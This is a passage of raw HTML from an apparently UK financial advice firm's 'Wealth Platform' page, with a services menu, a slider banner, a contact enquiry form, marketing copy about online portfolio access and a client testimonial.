id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									&#13;\n				<!-- START REVOLUTION SLIDER 3.0.95 fullwidth mode -->&#13;\n				&#13;\n								&#13;\n								<div id=\"rev_slider_33_1_wrapper\" class=\"rev_slider_wrapper fullwidthbanner-container\" style=\"margin:0px auto;background-color:#E9E9E9;padding:0px;margin-top:0px;margin-bottom:0px;max-height:376px;\">&#13;\n					<div id=\"rev_slider_33_1\" class=\"rev_slider fullwidthabanner\" style=\"display:none;max-height:376px;height:376;\">						&#13;\n										<ul><li data-transition=\"fade\" data-slotamount=\"7\">&#13;\n						&#13;\n														<div class=\"tp-caption lfb\" data-x=\"6\" data-y=\"35\" data-speed=\"300\" data-start=\"0\" data-easing=\"easeOutExpo\">					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption large_text lfr\" data-x=\"11\" data-y=\"38\" data-speed=\"1250\" data-start=\"0\" data-easing=\"easeOutExpo\">Wealth Platform					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption small_text lfb\" data-x=\"12\" data-y=\"86\" data-speed=\"750\" data-start=\"0\" data-easing=\"easeOutExpo\">Blending Hi Tech with Hi Touch, we manage all your wealth securely<br/> in one place to give you more powerful data analytics control &amp; visibility.<br/>Clients can access their portfolio online via our online portal, on a pc,<br/>or most tablets and smartphones.					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption alt1 lfb\" data-x=\"13\" data-y=\"208\" data-speed=\"750\" data-start=\"0\" data-easing=\"easeOutExpo\"><a href=\"../contact-us/\" class=\"button large green\">Click For Advice</a>					 					 </div>&#13;\n				&#13;\n									</li>&#13;\n								</ul></div>&#13;\n				</div>				&#13;\n							&#13;\n			<script type=\"text/javascript\"><![CDATA[\r\n\r\n				var tpj=jQuery;\r\n				\r\n									tpj.noConflict();\r\n								\r\n				var revapi33;\r\n				\r\n				tpj(document).ready(function() {\r\n				\r\n				if (tpj.fn.cssOriginal != undefined)\r\n					tpj.fn.css = tpj.fn.cssOriginal;\r\n				\r\n				if(tpj(\'#rev_slider_33_1\').revolution == undefined)\r\n					revslider_showDoubleJqueryError(\'#rev_slider_33_1\');\r\n				else\r\n				   revapi33 = tpj(\'#rev_slider_33_1\').show().revolution(\r\n					{\r\n						delay:10000,\r\n						startwidth:960,\r\n						startheight:376,\r\n						hideThumbs:200,\r\n						\r\n						thumbWidth:100,\r\n						thumbHeight:50,\r\n						thumbAmount:1,\r\n						\r\n						navigationType:\"bullet\",\r\n						navigationArrows:\"solo\",\r\n						navigationStyle:\"round\",\r\n						\r\n						touchenabled:\"on\",\r\n						onHoverStop:\"off\",\r\n						\r\n						navigationHAlign:\"center\",\r\n						navigationVAlign:\"bottom\",\r\n						navigationHOffset:0,\r\n						navigationVOffset:20,\r\n\r\n						soloArrowLeftHalign:\"left\",\r\n						soloArrowLeftValign:\"center\",\r\n						soloArrowLeftHOffset:20,\r\n						soloArrowLeftVOffset:0,\r\n\r\n						soloArrowRightHalign:\"right\",\r\n						soloArrowRightValign:\"center\",\r\n						soloArrowRightHOffset:20,\r\n						soloArrowRightVOffset:0,\r\n								\r\n						shadow:0,\r\n						fullWidth:\"on\",\r\n						fullScreen:\"off\",\r\n\r\n						stopLoop:\"off\",\r\n						stopAfterLoops:-1,\r\n						stopAtSlide:-1,\r\n\r\n						shuffle:\"off\",\r\n						\r\n						hideSliderAtLimit:0,\r\n						hideCaptionAtLimit:0,\r\n						hideAllCaptionAtLilmit:0,\r\n						startWithSlide:0,\r\n						videoJsPath:\"http://www.equalitywalk.org.uk/wp-content/plugins/revslider/rs-plugin/videojs/\",\r\n						fullScreenOffsetContainer: \"\"	\r\n					});\r\n				\r\n				});	//ready\r\n				\r\n			]]></script><!-- END REVOLUTION SLIDER --></div>&#13;\n																<div id=\"main\" class=\"width-100\" style=\"overflow:hidden !important;padding-left:0px;padding-right:0px;\">&#13;\n		<div class=\"avada-row\" style=\"max-width:100%;\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-34\" class=\"post-34 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Wealth Platform</span>&#13;\n			<span class=\"updated\" style=\"display: none;\"/>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"fullwidth-box\" style=\"background-color:;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:20px;padding-bottom:20;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<div class=\"one_half\">&#13;\n<p>What is our Wealth Management platform?</p><div class=\"demo-sep sep-single\" style=\"margin-top:10px;margin-bottom:10px\"/>&#13;\n<p>It is a simple and reliable way to have your pension and investments collated and updated securely in one place –regardless of where you hold investments, helping to demystify wealth management and put you in control.</p>&#13;\n<a class=\"button large green\" href=\"#standard\" target=\"\">Find Out More</a><a id=\"iphorm_fancybox_52fe0c9e21a43\" class=\"iphorm-fancybox-link iphorm-fancybox-link-1\" href=\"#\"/>&#13;\n<script type=\"text/javascript\"><![CDATA[\r\n<!--\r\n    jQuery(document).ready(function ($) {\r\n        var $link = $(\'#iphorm_fancybox_52fe0c9e21a43\');\r\n        if ($.isFunction($.fn.fancybox) && !$link.data(\'iphorm-initialised\')) {\r\n            $link.fancybox($.extend({\r\n                inline: true,\r\n                href: \'#iphorm-outer-52fe0c9decc2f\',\r\n                onStart: function () {\r\n                    $(\'#fancybox-outer\').css(\'opacity\', 0);\r\n                },\r\n                onComplete: function () {\r\n                    $(\'#fancybox-wrap, #fancybox-content\').css({width: \'auto\'});\r\n                    $.fancybox.center(0);\r\n                    setTimeout(function () {\r\n                        $(\'#fancybox-outer\').animate({opacity: 1}, 400);\r\n                        $(\'#fancybox-overlay\').css({height: $(document).height()});\r\n                    }, 1);\r\n                }\r\n            }, {})).data(\'iphorm-initialised\', true);\r\n        }\r\n    });\r\n//-->\r\n]]></script><div style=\"display: none;\">&#13;\n<div id=\"iphorm-outer-52fe0c9decc2f\" class=\"iphorm-outer iphorm-outer-1 iphorm-uniform-theme-default iphorm-theme-light-rounded\">&#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n		    jQuery(document).ready(function($) {\r\n			\r\n        	$(\'#iphorm-52fe0c9decc2f\').iPhorm({\"id\":1,\"uniqueId\":\"52fe0c9decc2f\",\"PHPSESSID\":\"95deae3b676a1decee14da6c4670c30a\",\"useAjax\":true,\"successMessageTimeout\":10,\"clElementIds\":[],\"clDependentElementIds\":[],\"centerFancybox\":true,\"centerFancyboxSpeed\":true});\r\n\r\n	        	        if ($.isFunction($.fn.qtip)) {\r\n	            $(\'.iphorm-tooltip-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'focus\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'click\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-labels-inside > .iphorm-element-spacer > label\').hover(function () {\r\n	                $(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'show\');\r\n	            }, function () {\r\n	            	$(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'hide\');\r\n	            });\r\n	        }\r\n	        \r\n	        	        if ($.isFunction($.fn.uniform)) {\r\n	            $(\'select, input:checkbox, input:radio\', iPhorm.instance.$form).uniform({context: iPhorm.instance.$form, selectAutoWidth: false});\r\n	        }\r\n	        \r\n	        if ($.isFunction($.fn.inFieldLabels)) {\r\n	            $(\'.iphorm-labels-inside:not(.iphorm-element-wrap-recaptcha) > .iphorm-element-spacer > label\', iPhorm.instance.$form).inFieldLabels();\r\n	        }\r\n\r\n	        \r\n	        $(\'.iphorm-group-row > div:last-child:not(:first-child)\', iPhorm.instance.$form).add(\'.iphorm-group-row:last-child\', iPhorm.instance.$form).addClass(\'last-child\');\r\n\r\n	        	    }); // end document.ready()\r\n	//-->\r\n	]]></script><form id=\"iphorm-52fe0c9decc2f\" class=\"iphorm iphorm-form-1\" action=\"../wealth-platform/\" method=\"post\" enctype=\"multipart/form-data\">&#13;\n        <div class=\"iphorm-inner iphorm-inner-1\">&#13;\n            <input type=\"hidden\" name=\"iphorm_id\" value=\"1\"/><input type=\"hidden\" name=\"iphorm_uid\" value=\"52fe0c9decc2f\"/><input type=\"hidden\" name=\"form_url\" value=\"http://www.equalitywalk.org.uk/wealth-platform/\"/><input type=\"hidden\" name=\"referring_url\" value=\"\"/><input type=\"hidden\" name=\"post_id\" value=\"34\"/><input type=\"hidden\" name=\"post_title\" value=\"Wealth Platform\"/><h3 class=\"iphorm-title\">Contact Equity SMART&#13;\n                                        </h3><p class=\"iphorm-description\"><big>For expert impartial advice and a FREE consultation with no obligation fill out the short form below.<br/><br/>&#13;\n&#13;\nor<br/><br/><b>Call Us FREE on <span class=\"rTapNumber13629\"/></b>&#13;\n</big></p>&#13;\n                                    	            		<div class=\"iphorm-success-message iphorm-hidden\"/>&#13;\n            	                        <div class=\"iphorm-elements iphorm-elements-1 iphorm-clearfix\">&#13;\n                <div class=\"iphorm-group-wrap iphorm_1_6-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-1cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_1-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_1-element-spacer\">&#13;\n                    <label for=\"iphorm_1_1_52fe0c9decc2f\">&#13;\n                Name                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_1-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_1\" id=\"iphorm_1_1_52fe0c9decc2f\" type=\"text\" name=\"iphorm_1_1\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-group-wrap iphorm_1_8-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_5-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_5-element-spacer\">&#13;\n                    <label for=\"iphorm_1_5_52fe0c9decc2f\">&#13;\n                Contact Number                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_5-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_5\" id=\"iphorm_1_5_52fe0c9decc2f\" type=\"text\" name=\"iphorm_1_5\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_2-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_2-element-spacer\">&#13;\n                    <label for=\"iphorm_1_2_52fe0c9decc2f\">&#13;\n                Email address                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_2-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_2\" id=\"iphorm_1_2_52fe0c9decc2f\" type=\"text\" name=\"iphorm_1_2\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div></div><div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-checkbox iphorm_1_11-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-checkbox iphorm_1_11-element-spacer\">&#13;\n                    <label class=\"iphorm_1_11-outer-label\">&#13;\n                What Would You Like To Discuss?                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-checkbox iphorm_1_11-input-wrap\">&#13;\n            <div class=\"iphorm-input-ul iphorm-input-checkbox-ul iphorm_1_11-input-ul iphorm-options-block iphorm-clearfix\">&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_1_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_1\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fe0c9decc2f_1\" value=\"Pensions\"/>&#13;\n                        Pensions                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_2_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_2\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fe0c9decc2f_2\" value=\"Insurance\"/>&#13;\n                        Insurance                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_3_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_3\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fe0c9decc2f_3\" value=\"Trusts\"/>&#13;\n                        Trusts                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_4_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_4\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fe0c9decc2f_4\" value=\"Investments\"/>&#13;\n                        Investments                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_5_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_5\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fe0c9decc2f_5\" value=\"Wealth\"/>&#13;\n                        Wealth                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_6_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_6\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fe0c9decc2f_6\" value=\"Other\"/>&#13;\n                        Other                    </label>&#13;\n                </div>&#13;\n                        </div>&#13;\n                    </div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-textarea iphorm_1_10-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-textarea iphorm_1_10-element-spacer\">&#13;\n                    <label for=\"iphorm_1_10_52fe0c9decc2f\">&#13;\n                Comments                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-textarea iphorm_1_10-input-wrap\">&#13;\n            <textarea class=\"iphorm-element-textarea  iphorm_1_10\" id=\"iphorm_1_10_52fe0c9decc2f\" name=\"iphorm_1_10\" rows=\"5\" cols=\"25\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-element-wrap iphorm-element-wrap-captcha iphorm_1_4-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-captcha iphorm_1_4-element-spacer\">&#13;\n                    <label for=\"iphorm_1_4_52fe0c9decc2f\">&#13;\n                Type the characters                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-captcha iphorm_1_4-input-wrap\">&#13;\n            <input class=\"iphorm-element-captcha  iphorm_1_4\" id=\"iphorm_1_4_52fe0c9decc2f\" type=\"text\" name=\"iphorm_1_4\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-captcha-image-wrap iphorm-clearfix iphorm_1_4-captcha-image-wrap\">&#13;\n            <div class=\"ifb-captcha-image-inner\">&#13;\n                &#13;\n            </div>&#13;\n        </div>&#13;\n&#13;\n        <script type=\"text/javascript\"><![CDATA[\r\n        <!--\r\n        jQuery(document).ready(function ($) {\r\n            $(\'#iphorm-captcha-image-iphorm_1_4_52fe0c9decc2f\').hover(function () {\r\n                $(this).stop().fadeTo(\'slow\', \'0.3\');\r\n            }, function () {\r\n                $(this).stop().fadeTo(\'slow\', \'1.0\');\r\n            }).click(function () {\r\n                var newSrc = $(this).attr(\'src\').replace(/&t=.+/, \'&t=\' + new Date().getTime());\r\n                $(this).attr(\'src\', newSrc);\r\n            });\r\n        });\r\n        //-->\r\n        ]]></script><div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-hidden\">&#13;\n    <label>This field should be left blank<input type=\"text\" name=\"iphorm_1_0\"/></label>&#13;\n</div>                <div class=\"iphorm-submit-wrap iphorm-submit-wrap-1 iphorm-clearfix\">&#13;\n                	<div class=\"iphorm-submit-input-wrap iphorm-submit-input-wrap-1\">&#13;\n                        <button class=\"iphorm-submit-element\" type=\"submit\" name=\"iphorm_submit\"><span><em>Send Enquiry</em></span></button>&#13;\n                    </div>&#13;\n                    <div class=\"iphorm-loading-wrap\"><span class=\"iphorm-loading\">Please wait...</span></div>&#13;\n                </div>&#13;\n            </div>&#13;\n                                            </div>&#13;\n            &#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n	jQuery(\'#iphorm-outer-52fe0c9decc2f script\').remove();\r\n	//-->\r\n	]]></script></form></div></div>&#13;\n        <br/><script type=\"text/javascript\"><![CDATA[// <![CDATA[\r\njQuery(document).ready(function ($) {     $(\'a[href=\"#standard\"]\').click(function () {         $(\'.iphorm-fancybox-link\').click();         return false;     }); });\r\n// ]]&gt;]]></script><p/></div>&#13;\n<div class=\"one_half last\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#imageframe-1.imageframe{float:;}\r\n	#imageframe-1.imageframe img{border:1px solid #f6f6f6;}\r\n	#imageframe-1.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-1.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-1\" class=\"imageframe imageframe-dropshadow\"><img class=\"alignleft size-full wp-image-393\" alt=\"Wealth management tool screenshot\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2012/06/wealth-management-screenshot.jpg\" width=\"320\" height=\"214\"/></span>&#13;\n<p/></div><div class=\"clearboth\"/></div></div><div class=\"fullwidth-box\" style=\"background-color:#f4f4f4;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:1px solid #e6e6e6;border-bottom:1px solid #e6e6e6;padding-top:20px;padding-bottom:1px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<div class=\"title\"><h2>Wealth Platform FEATURES</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div><div class=\"demo-sep sep-none\" style=\"margin-top:40px;\"/><style type=\"text/css\"><![CDATA[\r\n		#content-boxes-1 article.col{background-color:#ffffff !important;}\r\n		#content-boxes-1 .fontawesome-icon.circle-yes{color:#ffffff !important;background-color:#afd9a5 !important;border:1px solid #afd9a5 !important;}\r\n		]]></style><section class=\"clearfix columns content-boxes content-boxes-icon-boxed columns-3\" id=\"content-boxes-1\"><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-tablet\"/><h2>Cutting Edge</h2></div><div class=\"col-content-container \">Cutting edge technologies that can hold a wide ranges of your holdings &amp; investments in one place.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-thumbs-up\"/><h2>Valuations Insight</h2></div><div class=\"col-content-container \">Up to the minute valuations on all your investments which are instant and accurate</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-magic\"/><h2>Lower Charges</h2></div><div class=\"col-content-container \">A clear and transparent charging structure which is both competitive and easy to understand.</div></article></section><div class=\"title\"><h2>How YOU Benefit</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div><div class=\"demo-sep sep-none\" style=\"margin-top:40px;\"/>&#13;\n<style type=\"text/css\"><![CDATA[\r\n		#content-boxes-2 article.col{background-color:#ffffff !important;}\r\n		#content-boxes-2 .fontawesome-icon.circle-yes{color:#ffffff !important;background-color:#afd9a5 !important;border:1px solid #afd9a5 !important;}\r\n		]]></style><section class=\"clearfix columns content-boxes content-boxes-icon-boxed columns-3\" id=\"content-boxes-2\"><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-tablet\"/><h2>Transparent</h2></div><div class=\"col-content-container \">Visability &amp; transparency with web-based management systems giving you online access to your entire portfolio.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-thumbs-up\"/><h2>Save Time</h2></div><div class=\"col-content-container \">Save more time by being able to view your entire valuation history at the touch of a button.!</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-magic\"/><h2>Save Money</h2></div><div class=\"col-content-container \">A cost effective platform, in the current post RDR financial services market, tailored to suit your individual needs.</div></article></section></div></div><div class=\"fullwidth-box\" style=\"background-color:;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:20;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"><div class=\"one_half\">&#13;\n<p>Our Happy Clients</p>&#13;\n<style type=\"text/css\"><![CDATA[\r\n		#testimonials-1 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-1 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-1\" class=\"reviews clearfix\">&#13;\n<div class=\"review male\"><blockquote><q>“Very pleased with the service provided. Highly professional and standard of information provided was very comprehensive. I was kept informed at all stages of the process.”</q><div class=\"clearfix\"><span class=\"company-name\">Stephen McCoy</span></div></blockquote></div>&#13;\n</div>&#13;\n<p><span style=\"color: #afd9a5;\">More Information On Our Wealth Management platform?</span></p><div class=\"demo-sep sep-single\" style=\"margin-top:10px;margin-bottom:10px\"/>&#13;\n<p>It enables us to focus on planning and looking after your financial needs. It will show you the complete picture of all your investments, everything – helping you focus on the most important thing – getting your future right.</p>&#13;\n<p>You also benefit from:</p>&#13;\n<ul><li>A range of Tax Wrappers (e.g. ISAs Pensions, Offshore Bond etc)</li>&#13;\n<li>Access to risk categorised Model Portfolios</li>&#13;\n<li>Regular reviews / Ongoing Wealth Valuation Statements</li>&#13;\n<li>Rebalancing &amp; access to investment discounts</li>&#13;\n<li>Secure, online access to your portfolio at anytime!</li>&#13;\n</ul><p>If suitable, we can discuss the cost of this service and what assets are suitable for the platform, based on your own unique circumstances</p>&#13;\n<a class=\"button large green\" href=\"#standard\" target=\"\">Find Out More</a>&#13;\n</div>&#13;\n<div class=\"one_half last\">&#13;\n<p>Request A 